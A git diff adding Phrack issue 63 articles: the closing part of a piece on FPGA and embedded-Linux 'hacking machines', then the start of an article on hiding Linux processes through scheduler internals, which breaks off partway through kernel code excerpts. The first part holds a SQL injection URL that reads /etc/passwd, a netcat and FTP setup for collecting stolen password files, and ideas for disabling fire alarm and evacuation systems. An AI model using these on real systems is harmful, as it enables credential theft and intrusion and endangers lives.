+some security protections to filter out some dangerous symbols, so we 
+decided to use char() method of injection. We assume the total columns in 
+the table that access by show.php is 8.
+
+Now, we define:
+
+    char getpass[]="http://192.168.1.1/show.php?id=1%20and%201=2%20union
+      %20select%208,7,load_file(char(47,101,116,99,47,112,97,115,115,119,
+      100)),5,4,3,2,1";    
+
+as attacking string, and we store the respond data (content of 
+/etc/passwd) in a file name of password.dat. By creating a pipe to the 
+netcat, and at the same time to make sure the attacking string is always 
+triggered by the push-button, well, our "hacking machine" is ready.
+
+    Plug the "hacking machine" into any of the RJ45 socket in the LAN, 
+following by pressing a button to trigger the attacking string against 
+192.168.1.1. After that, unplug the "hacking machine" and connect to a 
+pc, download the password.dat from the "hacking machine", and start the 
+cracking process. By utilizing the advantages of FPGA architecture,
+a hardware cracker can be appended for embedded based cracking process.
+Any optional module can be designed in Verilog-HDL and attach to the 
+FPGA for all-in-one hacking purpose. The advantages of FPGA implementation
+over the conventional hardcore processors will be deepened in the 
+following section, with a lot of case-studies, comparisons and 
+wonderful examples.
+
+Tips:
+   
+**FTP server is recommended to be installed in "hacking machine" 
+because of two reasons:
+
+  1) Any new or value-added updates (trojans, exploits, worms,...) to 
+     the "hacking machine" can be done through FTP (online update).
+     
+  2) The grabbed information (password files, configuration files,...) 
+     can be retrieved easily.
+     
+Notes:
+
+**Installation of FTP server in uClinux is done by editing 
+  userland/.config file to enable the ftpd service.     
+
+**This is just a demostration, it is nearly impossible to get a 
+  unix/linux machine that do not utilize file-permission and shadow 
+  to protect the password file. This article is purposely to show 
+  the migration of hacking methodology from PC-based into embedded 
+  system based.
+  
+
+--[ 6. - What The Advantages Of Using FPGA In Hacking ?
+
+    Well, this is a good question while someone will ask by using a $50 
+Rabbit module, a 9V battery and 20 lines of Dynamic C, a simple "hacking 
+machine" can be implemented, instead of using a $300 FPGA development 
+board and a proprietary embedded processor with another $495. The answer 
+is, FPGA provides a very unique feature based on its architecture that is 
+able to be hardware re-programmable. 
+
+    As what we know, FPGA is a well known platform for algorithm 
+verification in hardware implementation, especially in DSP applications. 
+The demand for higher bit rates by the wired and wireless communications 
+industry has led to the development of higher bit rate and low cost serial 
+link interface chips. Based on such considerations, some demands of 
+programmable channel and band scanning are needed to be digitized and 
+re-programmable. A new term has been created for this type of framework 
+as "software defined radio" or SDR. However, the slow adoption of SDR is 
+due to the limitation in Analog-to-Digital Converter(ADC) to digitize 
+the analog demodulation unit in transceiver module. 
+Although the sampling rate of the most advanced ADC is not yet to meet 
+the specification of SDR, but it will come true soon. In this case, the 
+application of conventional DSP chips such as TMS320C6200 (for 
+fixed-point processing) and TMS320C6700 (for floating-point processing) 
+are a little bit harder to handle such extremely high bit rates. Of 
+course, someone may claim its parallel processing technique could solve 
+the problem by using the following symbols in linear assembly language[15].
+
+    	Inst1
+    ||	Inst2
+    ||	Inst3
+    ||	Inst4    
+    ||	Inst5
+    ||	Inst6
+	    Inst7	
+
+    The double-pipe symbols (||) indicate instructions that are in parallel
+with a previous instruction. Inst2 to Inst6, these five instructions run 
+in parallel with the first instruction, Inst1. In TMS320, up to eight 
+instructions can be running in parallel. However, this is not a true 
+parallel method, but perform pipelining in different time-slot within a 
+single clock cycle.
+Instead, the true parallel processing can only be implemented with 
+different sets of hardware module. So, FPGA should be the only solution to 
+implement a true parallel processing architecture. For the case of SDR that 
+is mentioned, it is just a an example to show the limitation of data 
+processing in the structure of resource sharing. Meanwhile, when we 
+consider to implement an encryption module, it is the same case as what 
+data processing do. The method of parallel processing is extremely worth to 
+enhance the time of key cracking process. Besides, it is significant to 
+know that the implementation of encryption module in FPGA is 
+hardware-driven. It is totally free from the limitation of any hardcore 
+processor structure that is using a single instruction pointer (or program 
+counter) to performing push and pop operations interactively over the stack 
+memory. So, both of the mentioned advantages: true-parallel processing, and 
+hardware-driven, are nicely clarified the uniqueness of FPGA's architecture 
+for advanced applications. 
+
+    While we go further with the uniqueness of FPGA's architecture, 
+more and more interesting issues can come into the discussion. 
+For hacking purpose, we focus and stick to the discussion of utilizing 
+the ability of hardware re-programmable in a FPGA-based "hacking machine". 
+We ignore the ability of "software re-programmable" here because it can be 
+done by any of the hardcore processor in the lowest cost. By applying the 
+characterictic of hardware re-programmable, a segment of space in flash 
+memory is reserved for hardware image. In Nios, it is started from 
+0x600000. This segment is available to be updated from remote through the 
+network interface. In advanced mobile communication, this type of feature 
+is started to be used for hardware bug-fix as well as module update [16] 
+purpose. It is usually known as Over-The-Air (OTA) technology. For hacking 
+purpose, the characteristic of hardware re-programmable had made our 
+"hacking machine" to be general purpose. It can come with a hardware-driven 
+DES cracker, and easily be changed to MD5 cracker or any other types of 
+hardware-driven module. Besides, it can also be changed from an online 
+cracker to be a proxy, in a second of time. 
+
+    In this state, the uniqueness of FPGA's architecture is clear now. 
+So, it is the time to start the discussion of black magic with the 
+characteristic of hardware re-programmable in further detail. By using 
+Nios-core, we explore from two points: custom instruction and user 
+peripheral. A custom instruction is hardware-driven and implemented by 
+custom logic as shown below:
+
+       |---->|------------|
+       |     |Custom Logic|-|
+       | |-->|------------| |
+       | |                  | 
+       | | |----------------||
+    A ---->|               |-|
+       |   |  Nios-ALU     | |----> OUT
+    B ---->|               |-|
+           |-----------------|           
+        
+By defining a custom logic that is parallel connected with Nios-ALU inputs, 
+a new custom instruction is successfully created. With SOPC Builder, custom 
+logic can be easily add-on and take-out from Nios-ALU, and so is the case 
+of custom instruction. Now, we create a new custom instruction, let say 
+nm_fpmult(). We apply the following codes:
+
+    float a, b, result_slow, result_fast;
+
+    result_slow = a * b;            //Takes 2874 clock cycles
+    result_fast = nm_fpmult(a, b);  //Takes 19 clock cycles
+
+From the running result, the operation of hardware-based multiplication 
+as custom instruction is so fast that is even faster than a DSP chip. 
+For cracking purpose, custom instructions set can be build up in respective 
+to the frequency of operations being used. The instructions set is easily 
+to be plugged and unplugged for different types of encryption being 
+adopted. 
+
+    The user peripheral is the second black magic of hardware 
+re-programmable. As we know Nios-core is a soft processor, so a bus 
+specification is needed for the communication of soft processor with other 
+peripherals, such as RAM, ROM, UART, and timer. Nios-core is using a 
+proprietary bus specification, known as Avalon-bus for 
+peripheral-to-peripheral and Nios-core-to-peripheral communication purpose.
+So, user peripherals such as IDE and USB modules are usually be designed to 
+expand the usability of embedded system. For hacking purpose, we ignore the 
+IDE and USB peripherals because we are more interested to design user 
+peripheral for custom communication channel synchronization. When we 
+consider to hack a customize system such as building automation, public 
+addressing, evacuation, security, and so on, the main obstacle is its 
+proprietary communication protocol [17, 18, 19, 20, 21, 22]. 
+
+    In such case, a typical network interface is almost impossible to 
+synchronize into the communication channel of a customize system. 
+For example, a system that is running at 50Mbps, neither a 10Based-T
+nor 100Based-T network interface card can communicate with any module
+within the system. However, by knowing the technical specification of such 
+system, a custom communication peripheral can be created in FPGA. So, it is 
+able to synchronize our "hacking machine" into the communication channel of 
+the customize system. By going through the Avalon-bus, Nios-core is 
+available to manipulate the data-flow of the customize system. So, the 
+custom communication peripheral is going to be the customize media gateway 
+of our "hacking machine". The theoretical basis of custom communication 
+peripheral is come from the mechanism of clock data recovery (CDR). CDR is 
+a method to ensure the data regeneration is done with a decision circuit 
+that samples the data signal at the optimal instant indicated by a clock. 
+The clock must be synchronized as exactly the same frequency as the data 
+rate, and be aligned in phase with respect to the data. The production of 
+such a clock at the receiver is the goal of CDR. In general, the task of 
+CDR is divided into two: frequency acquisition and timing alignment. 
+    Frequency acquisition is the process that locks the receiver clock 
+frequency to the transmitted data frequency. Timing alignment is the phase 
+alignment of the clock so the decision circuit samples the data at the 
+optimal instant. Sometime, it is also named as bit synchronization or phase 
+locking. Most timing alignment circuits can perform a limited degree of 
+frequency acquisition, but additional acquisition aids may be needed. Data 
+oversampling method is being used to create the CDR for our "hacking 
+machine". By using the method of data oversampling, frequency acquisition 
+is no longer be put into the design consideration. By ensuring the sampling 
+frequency is always N times over than data rate, the CDR is able to work as 
+normal. To synchronize multiple of customize systems, a frequency synthesis 
+unit such as PLL is recommended to be used to make sure the sampling 
+frequency is always N times over than data rate. A framework of CDR 
+based-on the data oversampling method with N=4 is shown as following in 
+Verilog-HDL.
+
+**The sampling frequency is 48MHz (mclk), which is 4 times of 
+  data rate (12MHz).
+
+    //define input and output 
+    
+    input data_in;
+    input mclk;
+    input rst;
+    
+    output data_buf;
+    
+    //asynchronous edge detector
+
+    wire reset = (rst & ~(data_in ^ capture_buf));
+
+    //data oversampling module
+
+    reg capture_buf;
+
+    always @ (posedge mclk or negedge rst)
+      if (rst == 0) 
+        capture_buf <= 0;
+      else 
+        capture_buf <= data_in;
+    
+    //edge detection module
+
+    reg [1:0] mclk_divd;
+
+    always @ (posedge mclk or negedge reset or posedge reset)
+      if (reset == 0) 
+        mclk_divd <= 2'b00;	
+      else 
+        mclk_divd <= mclk_divd + 1;
+
+    //capture at data eye and put into a 16-bit buffer
+
+    reg [15:0] data_buf;
+    
+    always @ (posedge mclk_divd[1] or negedge rst)
+      if (rst == 0) 
+        data_buf <= 0;
+      else
+        data_buf <= {data_buf[14:0],capture_buf};
+
+    Once the channel is synchronized, the data can be transferred to 
+Nios-core through the Avalon-Bus for further processing and interaction. 
+The framework of CDR is plenty worth for channel synchronization in various 
+types of custom communication channels. Jean P. Nicolle had shown another 
+type of CDR for 10Base-T bit synchronization [23]. As someone might query 
+for the most common approach of performing CDR channel synchronization in 
+Phase-Locked Loop (PLL). Yes, this is a type of well known analog approach, 
+by we are more interested to the digital approach, with the reason of 
+hardware re-programmable - our black magic of FPGA. For those who 
+interested to know more advantages of digital CDR approach over the analog 
+CDR approach can refer to [24]. Anyway, the analog CDR approach is the only 
+option for a hardcore-based (Scenix, Rabbit, SC12 ,...) "hacking machine" 
+design, and it is sufferred to: 
+
+1. Longer design time for different data rate of the communication link.
+   The PLL lock-time to preamble length, charge-pump circuit design, 
+   Voltage Controlled Oscillator (VCO), are very critical points.
+   
+2. Fixed-structure design. Any changes of "hacking application" need
+   to re-design the circuit itself, and it is quite cumbersome.
+          
+    As a result, by getting a detail technical specification of a 
+customized system, the possibility to hack into the system has always 
+existed, especially to launch the Denial of Service attack. By disabling 
+an evacuation system, or a fire alarm system at emergency, it is a very 
+serious problem than ever. Try to imagine, when different types of CDRs 
+are implemented in a single FPGA, and it is able to perform automatic 
+switching to select a right CDR for channel synchronization. On the other 
+hand, any custom defined module is able to plug into the system itself 
+and freely communicate through Avalon-bus. Besides, the generated hardware 
+image is able to be downloaded into flash memory through tftp. By following 
+with a soft-reset to re-configure the FPGA, the "hacking machine" is 
+successfully updated. So, it is ready to hack multiple of custom systems at 
+the same time.   
+
+case study:
+
+**The development of OPC technology is slowly become popular.
+  According to The OPC Foundation, OPC technology can eliminate
+  expensive custom interfaces and drivers tranditionally required
+  for moving information easily around the enterprise. It promotes 
+  interoperability, including amongst different computing solutions
+  and platforms both horizontally and vertically in the emterprise [25].
+
+--[ 7. - What Else Of Magic That Embedded Linux Can Do ?
+
+    So, we know the weakness of embedded system now, and we also know 
+how to utilize the advantages of embedded system for hacking purpose. 
+Then, what else of magic that we can do with embedded system? This is a 
+good question.
+
+    By referring to the development of network applications, ubiquitous 
+and pervasive computing would be the latest issues. Embedded system would
+probably to be the future framework as embedded firewall, ubiquitous 
+gateway/router, embedded IDS, mobile device security server, and so on.
+While existing systems are looking for network-enabled, embedded system
+had established its unique position for such purpose. A good example is
+migrating MySQL into embedded linux to provide online database-on-chip
+service (in FPGA) for a building access system with RFID tags. Again, 
+the usage and development of embedded system has no limitation, the only 
+limitation is the imagination.
+
+Tips:
+
+**If an embedded system works as a server (http, ftp, ...), it is going
+  to provide services such as web control, web monitoring,...
+**If an embedded system works as a client (http, ftp, telnet, ..), then
+  it is more likely to be a programmable "hacking machine"    
+
+
+--[ 8. - Conclusion
+
+    Embedded system is an extremely useful technology, because we can't
+expect every processing unit in the world as a personal computer. While
+we are begining to exploit the usefullness of embedded system, we need
+to consider all the cases properly, where we should use it and where we
+shouldn't use it. Embedded security might be too new to discuss seriously
+now but it always exist, and sometime naive. Besides, the abuse of embedded
+system would cause more mysterious cases in the hacking world.
+
+
+--=[ References
+
+[1] http://www.siteplayer.com/ 
+
+[2] http://www.beck-ipc.com/
+
+[3] http://www.altera.com/
+
+[4] http://www.xilinx.com/
+
+[5] http://www.cl.cam.ac.uk/users/rnc1/descrack/index.html
+
+[6] Nios Development Kit, Stratix Edition: Getting Started User Guide
+    (Version 1.2) - July 2003
+    http://www.altera.com/literature/ug/ug_nios_gsg_stratix_1s10.pdf
+
+[7] http://www.microtronix.com/
+
+[8] Nios Hardware Development Tutorial (Version 1.1) - 
+    July 2003
+    http://www.altera.com/literature/tt/tt_nios2_hardware_tutorial.pdf
+
+[9] Nios Software Development Tutorial (Version 1.3) -
+    July 2003
+    http://www.altera.com/literature/tt/tt_nios_sw.pdf
+
+[10] Designing With The Nios (Part 1) -
+     Second-Order, Closed-Loop Servo Control
+     Circuit Cellar, #167, June 2004
+     
+[11] Designing With The Nios (Part 2) -
+     System Enhancement
+     Circuit Cellar, #168, July 2004
+     
+[12] Nios Tutorial (Version 1.1)
+     February 2004
+     http://www.altera.com/literature/tt/tt_nios_hw_apex_20k200e.pdf
+     
+[13] Microtronix Embedded Linux Development - 
+     Getting Started Guide: Document Revision 1.2
+     http://www.pldworld.com/_altera/html/_excalibur/niosldk/httpd/
+     getting_started_guide.pdf
+     
+[14] Stratix EP1S10 Device: Pin Information
+     February 2004
+     http://www.fulcrum.ru/Read/CDROMs/Altera/literature/lit-stx.html
+
+[15] TMS320C6000 Assembly Language Tools User's Guide
+     http://www.tij.co.jp/jsc/docs/dsps/support/download/tools/
+     toolspdf6000/spru186i.pdf
+
+[16] Dynamic Spectrum Allocation In Composite Reconfigurable Wireless
+     Networks
+     IEEE Communications Magazine, May 2004.
+     
+http://ieeexplore.ieee.org/iel5/35/28868/01299346.pdf?tp=&arnumber=
+     1299346&isnumber=28868
+    
+[17] TOA - VX-2000 (Digital Matrix System)
+     
+http://www.toa-corp.co.uk/asp/catalogue/products.asp?prodcode=VX-2000
+     
+[18] Klotz Digital - Vadis (Audio Matrix), VariZone (Complex Digital 
+     PA System For Emergency Evacuation Applications)
+     http://www.klotz-digital.de/products/pa.htm
+     
+[19] Peavey - MediaMatrix System
+     http://mediamatrix.peavey.com/home.cfm
+     
+[20] Optimus - Optimus (Audio & Communication), Improve 
+     (Distributed Audio)
+     http://www.optimus.es/eng/english.html
+     
+[21] Simplex - TrueAlarm (Fire Alarm Systems)
+     http://www.simplexgrinnell.com/
+     
+[22] Tyco - Fire Detection and Alarm, Integrated Security Systems,
+     Health Care Communication Systems
+     http://www.tycosafetyproducts-us.com
+     
+[23] 10Base-T FPGA Interface - Ethernet Packets: Sending and Receiving
+     http://www.fpga4fun.com/10BASE-T.html
+     
+[24] Ethernet Receiver
+     http://www.holmea.demon.co.uk/Ethernet/EthernetRx.htm
+
+[25] The OPC Foundation
+     http://www.opcfoundation.org/
+
+[26] www.ubicom.com (IP2022)
+
+[27] http://www.zilog.com/products/family.asp?fam=218 (eZ80)
+
+[29] http://www.fpga4fun.com/
+
+[29] http://www.elektroda.pl/eboard
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack63/18.txt b/phrack63/18.txt
new file mode 100644
index 0000000..8277936
--- /dev/null
+++ b/phrack63/18.txt
@@ -0,0 +1,1241 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x12 of 0x14
+
+|=------=[ hiding processes  ( understanding the linux scheduler ) ]=----=|
+|=-----------------------------------------------------------------------=|
+|=------------=[  by ubra from PHI Group -- 17 October 2004 ]=-----------=|
+|=-----=[ mail://ubra_phi.group.za.org  http://w3.phi.group.za.org ]=----=|
+
+
+--[ Table of contents
+
+  1 - looking back
+
+  2 - the schedule(r) inside
+
+  3 - abusing the silence ( attacking )
+
+  4 - can you scream ? ( countering )
+
+  5 - references
+
+  6 - and the game dont stop..
+
+  7 - sources
+
+
+
+--[ 1 - looking back
+
+    We begin our journey in the old days, when simply giving your
+process a weird name was enough to hide inside the tree. Sadly this is
+also quite effective these days due to lack of skill from stock admins.
+In the last millenium ..well actualy just before 1999, backdooring
+binaries was very popular (ps, top, pstree and others [1]) but this was
+very easy to spot, `ls -l` easy / although some could only be cought by
+a combination of size and some checksum / (i speak having in mind the
+skilled admin, because, in my view, an admin that isnt a bit hackerish
+is just the guy mopping up the keyboard). And it was a pain in the ass
+compatibility wise.
+
+    LRK (linux root kit) [2] is a good example of a "binary" kit.
+Not that long ago hackers started to turn towards the kernel to do their
+evil or to secure it. So,like everywhere this was an incremental process,
+starting from the upper level and going more inside kernel structures.
+The obvious place to look first were system calls, the entry point from
+userland to wonderland, and so the hooking method developed, be it by
+altering the sys_call_table[] (theres an article out there LKM_HACKING
+by pragmatic from THC about this [3]), or placing a jump inside the
+function body to your own code (developed by Silvio Cesare [4]) or even
+catching them at interrupt level (read about this in [5]).. and with this,
+one could intercept certain interesting system calls.
+
+    But syscalls are by no means the last (first) point where the pid
+structures get assembled. getdents() and alike are just calling on some
+other function, and they are doing this by means of yet another layer,
+going through the so called VFS. Hacking this VFS (Virtual FileSystem
+layer) is the new trend on todays kits; and since all unices are basicaly
+comprised of the same logical layers, this is (was) very portable. So as
+you see we are building from higher levels, programming wise, to lower
+levels; from simply backdoring the source of our troubles to going closer
+to the root, to the syscalls (and the functions that are
+"syscall-helpers"). The VFS is not by all means as low as we can go
+(hehe we hackers enjoy rolling in the mud of the kernel). We yet have to
+explore the last frontier (well relatively speaking any new frontier is 
+the last). Yup, the very structures that help create the pid list -
+the task_structs. And this is where our journey
+begins.
+
+    Some notes.. kernel studied is from 2.4 branch (2.4.18 for source
+excerpts and 2.4.30 for patches and example code), theres some x86
+specific code (sorry, i dont have access to other archs), also SMP is
+not discussed for the same reason and anyway it should be clear in the
+end what will be different from UP machines.
+
+/*
+	it seems the method i explain here is begining to emerge in part
+into the open underground in zero rk made by stealth from team teso, theres
+an article about it in phrack 61 [6], i was just about to miss the small
+REMOVE_LINKS looking so innocent there :-)
+*/
+
+
+
+--[ 2 - the schedule(r) inside
+
+    As processes give birth to other processes (just like in real life)
+they call on execve() or fork() syscalls to either get replaced or get
+splited into two different processes, a few things happen. We will look
+into fork as this is more interesting from our point of view.
+
+ $ grep -rn sys_fork src/linux/
+
+    For i386 compatible archs which is what I have, you will see that
+without any introduction this function calls do_fork() which is where the
+arch independent work gets done. It is in kernel/fork.c.
+
+<codesnip src="arch/i386/kernel/process.c" line=747>
+asmlinkage int sys_fork(struct pt_regs regs)
+{
+        return do_fork(SIGCHLD, regs.esp, &regs, 0);
+}
+</codesnip src="arch/i386/kernel/process.c">
+
+    Besides great things which are not within the scope of this here,
+do_fork() allocates memory for a new task_struct
+
+<codesnip src="kernel/fork.c" line=587>
+int do_fork(unsigned long clone_flags, unsigned long stack_start,
+            struct pt_regs *regs, unsigned long stack_size)
+{
+        .......
+        struct task_struct *p;
+        .......
+        p = alloc_task_struct();
+</codesnip src="kernel/fork.c">
+
+and does some stuff on it like initializing the run_list,
+
+<codesnip src="kernel/fork.c" line=653>
+        INIT_LIST_HEAD(&p->run_list);
+</codesnip src="kernel/fork.c">
+
+which is basicaly a pointer (you should read about the linux linked list
+implementation to grasp this clearly [7]) that will be used in a linked
+list of all the processes waiting for the cpu and those expired (that got
+the cpu taken away, not released it willingly by means of schedule()),
+used inside the schedule() function.
+
+	The current priority array of what task queue we are in
+<codesnip src="kernel/fork.c" line=687>
+        p->array = NULL;
+</codesnip src="kernel/fork.c">
+
+(well we arent in any yet); the prio array and the runqueues are used
+inside the schedule() function to organize the tasks running and needing to
+be run.
+
+<codesnip src="kernel/sched.c" line=124>
+typedef struct runqueue runqueue_t;
+
+struct prio_array {
+        int nr_active;
+        spinlock_t *lock;
+        runqueue_t *rq;
+        unsigned long bitmap[BITMAP_SIZE];
+        list_t queue[MAX_PRIO];
+};
+
+/*
+ * This is the main, per-CPU runqueue data structure.
+ *
+ * Locking rule: those places that want to lock multiple runqueues
+ * (such as the load balancing or the process migration code), lock
+ * acquire operations must be ordered by ascending &runqueue.
+ */
+struct runqueue {
+        spinlock_t lock;
+        unsigned long nr_running, nr_switches, expired_timestamp;
+        task_t *curr, *idle;
+        prio_array_t *active, *expired, arrays[2];
+        int prev_nr_running[NR_CPUS];
+} ____cacheline_aligned;
+
+static struct runqueue runqueues[NR_CPUS] __cacheline_aligned;
+</codesnip src="kernel/sched.c">
+
+We`ll be discussing more about this later.
+
+    The cpu time that this child will get; half the parent has goes to
+the child (the cpu time is the amout of time the task will get the
+processor for itself).
+
+<codesnip src="kernel/fork.c" line=727>
+        p->time_slice = (current->time_slice + 1) >> 1;
+        current->time_slice >>= 1;
+        if (!current->time_slice) {
+                /*
+                 * This case is rare, it happens when the parent has only
+                 * a single jiffy left from its timeslice. Taking the
+                 * runqueue lock is not a problem.
+                 */
+                current->time_slice = 1;
+                scheduler_tick(0,0);
+        }
+</codesnip src="kernel/fork.c">
+
+(for the neophytes, ">> 1" is the same as "/ 2")
+
+    Next we get the tasklist lock for write to place the new process in
+the linked list and pidhash list
+
+<codesnip src="kernel/fork.c" line=752>
+        write_lock_irq(&tasklist_lock);
+	.......
+        SET_LINKS(p);
+        hash_pid(p);
+        nr_threads++;
+        write_unlock_irq(&tasklist_lock);
+</codesnip src="kernel/fork.c">
+
+and release the lock. include/linux/sched.h has these macro and inline
+functions, and the struct task_struct also:
+
+<codesnip src="include/linux/sched.h" line=292>
+struct task_struct {
+        .......
+        task_t *next_task, *prev_task;
+        .......
+        task_t *pidhash_next;
+        task_t **pidhash_pprev;
+</codesnip src="include/linux/sched.h">
+
+<codesnip src="include/linux/sched.h" line=532>
+#define PIDHASH_SZ (4096 >> 2)
+extern task_t *pidhash[PIDHASH_SZ];
+
+#define pid_hashfn(x)   ((((x) >> 8) ^ (x)) & (PIDHASH_SZ - 1))
+
+static inline void hash_pid(task_t *p)
+{
+        task_t **htable = &pidhash[pid_hashfn(p->pid)];
+
+        if((p->pidhash_next = *htable) != NULL)
+                (*htable)->pidhash_pprev = &p->pidhash_next;
+        *htable = p;
+        p->pidhash_pprev = htable;
+}
+</codesnip src="include/linux/sched.h">
+
+<codesnip src="include/linux/sched.h" line=863>
+#define SET_LINKS(p) do { \
+        (p)->next_task = &init_task; \
+        (p)->prev_task = init_task.prev_task; \
+        init_task.prev_task->next_task = (p); \
+        init_task.prev_task = (p); \
+        (p)->p_ysptr = NULL; \
+        if (((p)->p_osptr = (p)->p_pptr->p_cptr) != NULL) \
+                (p)->p_osptr->p_ysptr = p; \
+        (p)->p_pptr->p_cptr = p; \
+        } while (0)
+</codesnip src="include/linux/sched.h">
+
+    So, pidhash is an array of pointers to task_structs which hash to
+the same pid, and are linked by means of pidhash_next/pidhash_pprev; this
+list is used by syscalls which get a pid as parameter, like kill() or
+ptrace(). The linked list is used by the /proc VFS and not only.
+
+	Last, the magic:
+
+<codesnip src="kernel/fork.c" line=776>
+#define RUN_CHILD_FIRST 1
+#if RUN_CHILD_FIRST
+        wake_up_forked_process(p);      /* do this last */
+#else
+        wake_up_process(p);             /* do this last */
+#endif
+</codesnip src="kernel/fork.c">
+
+this is a function in kernel/sched.c which places the task_t (task_t is a
+typedef to a struct task_struct) in the cpu runqueue.
+
+<codesnip src="kernel/sched.c" line=347>
+void wake_up_forked_process(task_t * p)
+{
+        .......
+        p->state = TASK_RUNNING;
+        .......
+        activate_task(p, rq);
+</codesnip src="kernel/sched.c">
+
+    So lets walk through a process that after it gets the cpu calls just
+sys_nanosleep (sleep() is just a frontend) and jumps in a never ending loop,
+ill try to make this short. After setting the task state to
+TASK_INTERRUPTIBLE (makes sure we get off the cpu queue when schedule() is
+called), sys_nanosleep() calls upon another function, schedule_timeout()
+which sets us on a timer queue by means of add_timer() which makes sure we
+get woken up (that we get back on the cpu queue) after the delay has
+passed and effectively relinquishes the cpu by calling shedule() (most
+blocking syscalls implement this by putting the process to sleep until the
+perspective resource is available).
+
+<codesnip src="kernel/timer.c" line=877>
+asmlinkage long sys_nanosleep(struct timespec *rqtp, struct timespec *rmtp)
+{
+        .......
+        current->state = TASK_INTERRUPTIBLE;
+        expire = schedule_timeout(expire);
+</codesnip src="kernel/timer.c">
+
+<codesnip src="kernel/timer.c" line=819>
+signed long schedule_timeout(signed long timeout)
+{
+        struct timer_list timer;
+        .......
+        init_timer(&timer);
+        timer.expires = expire;
+        timer.data = (unsigned long) current;
+        timer.function = process_timeout;
+
+        add_timer(&timer);
+        schedule();
+</codesnip src="kernel/timer.c">
+
+If you want to read more about timers look into [7].
+
+    Next, schedule() takes us off the runqueue since we already arranged
+to be set on again there later by means of timers.
+
+<codesnip src="kernel/sched.c" line=744>
+asmlinkage void schedule(void)
+{
+        .......
+                deactivate_task(prev, rq);
+</codesnip src="kernel/sched.c">
+
+(remember that wake_up_forked_process() called activate_task() to place us
+on the active run queue). In case there are no tasks in the active queue
+it tryes to get some from the expired array as it needs to set up for
+another task to run.
+
+<codesnip src="kernel/sched.c" line=784>
+        if (unlikely(!array->nr_active)) {
+                /*
+                 * Switch the active and expired arrays.
+                 */
+		.......
+</codesnip src="kernel/sched.c">
+
+Then finds the first process there and prepares for the switch (if it
+doesnt find any it just leaves the current task running).
+
+<codesnip src="kernel/sched.c" line=805>
+                context_switch(prev, next);
+</codesnip src="kernel/sched.c">
+
+This is an inline function that prepares for the switch which will get done
+in __switch_to() (switch_to() is just another inline function, sort of)
+
+<codesnip src="kernel/sched.c" line=400>
+static inline void context_switch(task_t *prev, task_t *next)
+</codesnip src="kernel/sched.c">
+
+<codesnip src="include/asm-i386/system.h" line=15>
+#define prepare_to_switch()     do { } while(0)
+#define switch_to(prev,next,last) do {                                  \
+        asm volatile("pushl %%esi\n\t"                                  \
+                     "pushl %%edi\n\t"                                  \
+                     "pushl %%ebp\n\t"                                  \
+                     "movl %%esp,%0\n\t"        /* save ESP */          \
+                     "movl %3,%%esp\n\t"        /* restore ESP */       \
+                     "movl $1f,%1\n\t"          /* save EIP */          \
+                     "pushl %4\n\t"             /* restore EIP */       \
+                     "jmp __switch_to\n"                                \
+                     "1:\t"                                             \
+                     "popl %%ebp\n\t"                                   \
+                     "popl %%edi\n\t"                                   \
+                     "popl %%esi\n\t"                                   \
+                     :"=m" (prev->thread.esp),"=m" (prev->thread.eip),  \
+                      "=b" (last)                                       \
+                     :"m" (next->thread.esp),"m" (next->thread.eip),    \
+                      "a" (prev), "d" (next),                           \
+                      "b" (prev));                                      \
+} while (0)
+</codesnip src="include/asm-i386/system.h">
+
+    Notice the "jmp __switch_to" inside all that assembly code that
+simply arranges the arguments on the stack.
+
+<codesnip src="arch/i386/kernel/process.c" line=682>
+void __switch_to(struct task_struct *prev_p, struct task_struct *next_p)
+{
+</codesnip src="arch/i386/kernel/process.c">
+
+context_switch() and switch_to() causes what is known as a context switch
+(hence the name) which in not so many words is giving the processor and
+memory control to another task.
+
+    But enough of this; now what happends when we jump in the never
+ending loop. Well, its not actually a never ending loop, if it would be
+your computer would just hang. What actually happends is that your task
+gets the cpu taken away from it every once in a while and gets it back
+after some other tasks get time to run (theres queueing mechanisms that
+let tasks share the cpu based on theire priority, if our task would have
+a real time priority it would have to release the cpu manualy by
+sched_yeld()). So how exactly is this done; lets talk a bit about the
+timer interrupt first coz its closely related.
+
+    This is a function like most things are in the linux kernel, and its
+described in a struct
+
+<codesnip src="arch/i386/kernel/time.c" line=556>
+static struct irqaction irq0  = { timer_interrupt, SA_INTERRUPT, 0,
+                                  "timer", NULL, NULL};
+</codesnip src="arch/i386/kernel/time.c">
+
+and setup in time_init.
+
+<codesnip src="arch/i386/kernel/time.c" line=635>
+void __init time_init(void)
+{
+        .......
+#ifdef CONFIG_VISWS
+        .......
+        setup_irq(CO_IRQ_TIMER, &irq0);
+#else
+        setup_irq(0, &irq0);
+#endif
+</codesnip src="arch/i386/kernel/time.c">
+
+After this, every timer click, timer_interrupt() is called and at some
+point calls do_timer_interrupt()
+
+<codesnip src="arch/i386/kernel/time.c" line=466>
+static void timer_interrupt(int irq, void *dev_id, struct pt_regs *regs)
+{
+        .......
+        do_timer_interrupt(irq, NULL, regs);
+</codesnip src="arch/i386/kernel/time.c">
+
+which calls on do_timer (bare with me).
+
+<codesnip src="arch/i386/kernel/time.c" line=393>
+static inline void do_timer_interrupt(int irq, void *dev_id,
+                                      struct pt_regs *regs)
+{
+        .......
+        do_timer(regs);
+</codesnip src="arch/i386/kernel/time.c">
+
+do_timer() does two things, first update the current process times and
+second call on schedule_tick() which precurses schedule() by first taking
+the current process of the active array and placing it in the expired
+array; this is the place where bad processes (the dirty hogs :-) get
+their cpu taken away from them.
+
+<codesnip src="kernel/timer.c" line=665>
+void do_timer(struct pt_regs *regs)
+{
+        (*(unsigned long *)&jiffies)++;
+#ifndef CONFIG_SMP
+        /* SMP process accounting uses the local APIC timer */
+
+        update_process_times(user_mode(regs));
+#endif
+</codesnip src="kernel/timer.c">
+
+<codesnip src="kernel/timer.c" line=578>
+/*
+ * Called from the timer interrupt handler to charge one tick to the
+ * current process.  user_tick is 1 if the tick is user time, 0 for system.
+ */
+void update_process_times(int user_tick)
+{
+        .......
+        update_one_process(p, user_tick, system, cpu);
+        scheduler_tick(user_tick, system);
+}
+</codesnip src="kernel/timer.c">
+
+<codesnip src="kernel/sched.c" line=663>
+/*
+ * This function gets called by the timer code, with HZ frequency.
+ * We call it with interrupts disabled.
+ */
+void scheduler_tick(int user_tick, int system)
+{
+     .......
+     /* Task might have expired already, but not scheduled off yet */
+        if (p->array != rq->active) {
+                p->need_resched = 1;
+                return;
+        }
+        .......
+        if (!--p->time_slice) {
+                dequeue_task(p, rq->active);
